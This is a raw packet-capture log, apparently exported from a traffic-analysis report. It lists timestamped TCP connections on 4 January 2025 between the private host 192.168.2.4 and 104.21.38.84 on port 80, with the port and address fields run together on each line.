                                                                                          Jan 4, 2025 11:07:38.732206106 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.732323885 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.734585047 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.736109972 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.737057924 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.739690065 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.739772081 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.741249084 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.741396904 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.076467037 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.081386089 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.081398964 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.081412077 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.195727110 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.326303005 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.467880964 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.470619917 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.475584030 CET8049738104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.475660086 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.790473938 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.795356989 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:39.795447111 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.795540094 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:39.800261021 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.154757977 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:40.159634113 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.159645081 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.159660101 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.254442930 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.295037031 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:40.519656897 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.590738058 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:40.937144995 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:40.942262888 CET8049739104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:40.942492008 CET4973980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.023972988 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.028764963 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.028845072 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.029134989 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.033932924 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.373244047 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.378158092 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.378170013 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.378181934 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.476635933 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.591924906 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:41.753307104 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:41.888789892 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.258774042 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.259421110 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.263989925 CET8049742104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.264045954 CET4974280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.264257908 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.264334917 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.264420033 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.269151926 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.623254061 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.628179073 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.628191948 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.628201008 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.718677044 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.933715105 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:42.933779001 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:42.979851007 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.045063019 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.310631990 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.314273119 CET4974580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.315716028 CET8049743104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.315825939 CET4974380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.319139957 CET8049745104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.319205999 CET4974580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.319298983 CET4974580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.324026108 CET8049745104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.516146898 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.520976067 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.521078110 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.521172047 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.525921106 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.643539906 CET4974580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.687031031 CET8049745104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.687112093 CET4974580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.873435020 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:43.878689051 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.878853083 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:43.984154940 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:44.091953039 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:45.280385017 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:45.280451059 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:45.280493021 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:45.280566931 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:45.280612946 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:45.280644894 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:45.280729055 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.587505102 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.588200092 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.592658043 CET8049746104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:47.592715979 CET4974680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.592983007 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:47.593080997 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.593194962 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.597937107 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:47.951421976 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:47.956376076 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:47.956388950 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:47.956402063 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:48.040193081 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:48.232594013 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:48.314719915 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:48.314940929 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:48.319885015 CET8049747104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:48.319936037 CET4974780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.296664000 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.301557064 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.301654100 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.301980972 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.306813002 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.659266949 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.664280891 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.664295912 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.745023012 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.888847113 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.998327017 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:51.049066067 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.606144905 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.606772900 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611203909 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.611264944 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611550093 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.611613989 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611726046 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.616503000 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.969275951 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.974242926 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.974256039 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.974263906 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.066816092 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.235723019 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.235768080 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.396816969 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.397656918 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.401762962 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.401806116 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.402482033 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.402539015 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.402632952 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.407355070 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.748358965 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.753304958 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.753317118 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.753324986 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.848474026 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.938148022 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.015687943 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.020508051 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.020567894 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.020870924 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.025623083 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.028518915 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.030806065 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.373337984 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.378181934 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.378472090 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.429419994 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.434290886 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.434349060 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.434451103 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.439162016 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.496519089 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.595103025 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.757910013 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.779599905 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.784498930 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.784507990 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.784516096 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.905772924 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.941431999 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.074405909 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.074640036 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.216401100 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.216666937 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.218015909 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.221488953 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.221602917 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.221772909 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.221904039 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.222773075 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.222862005 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.223012924 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.227793932 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.576494932 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.581429005 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.581445932 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.581459999 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.673707962 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.826395035 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.940002918 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.110089064 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.115489960 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.115544081 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.117409945 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.122185946 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.122246981 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.122347116 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.127089024 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.467423916 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.472366095 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.472388983 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.472481012 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.566174030 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.638887882 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.825326920 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.935786009 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.992355108 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.993153095 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.997482061 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.997641087 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.998018026 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.998100996 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.998178005 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.008729935 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.342278004 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.351298094 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.351321936 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.351331949 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.475691080 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.545141935 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.738610983 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.930341959 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.935451031 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.936934948 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.941879034 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.946655989 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.946722031 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.946829081 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.951577902 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.295303106 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.300153017 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.300165892 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.300173998 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.414685965 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.623294115 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.682635069 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.732661009 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.857275009 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.862418890 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.862508059 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.872039080 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.876919031 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.877003908 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.877168894 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.881990910 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.232722044 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.237660885 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.237673044 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.237680912 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.329539061 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.435791016 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.587917089 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.732666969 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.765899897 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.766514063 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.770926952 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.770967960 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.771346092 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.771408081 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.771512032 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.776297092 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.825912952 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.830801964 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.830849886 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.830960035 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.832101107 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.835767031 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.881732941 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.145642996 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.148245096 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.185900927 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.190798998 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.190810919 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.190857887 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.291271925 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.342012882 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.505383015 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.510448933 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.510508060 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.510622978 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.516999006 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.565619946 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.623533010 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.913868904 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918694973 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918713093 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918749094 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918768883 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918773890 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918783903 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918817043 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918828011 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918845892 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918854952 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918885946 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918889999 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918921947 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918930054 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918972969 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918984890 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918994904 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.919038057 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.923572063 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923583031 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923625946 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923634052 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923670053 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.923710108 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923719883 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923742056 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923758984 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.923780918 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923787117 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.923903942 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923913956 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923922062 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923950911 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.923988104 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.925903082 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.926395893 CET4978880192.168.2.4104.21.38.84
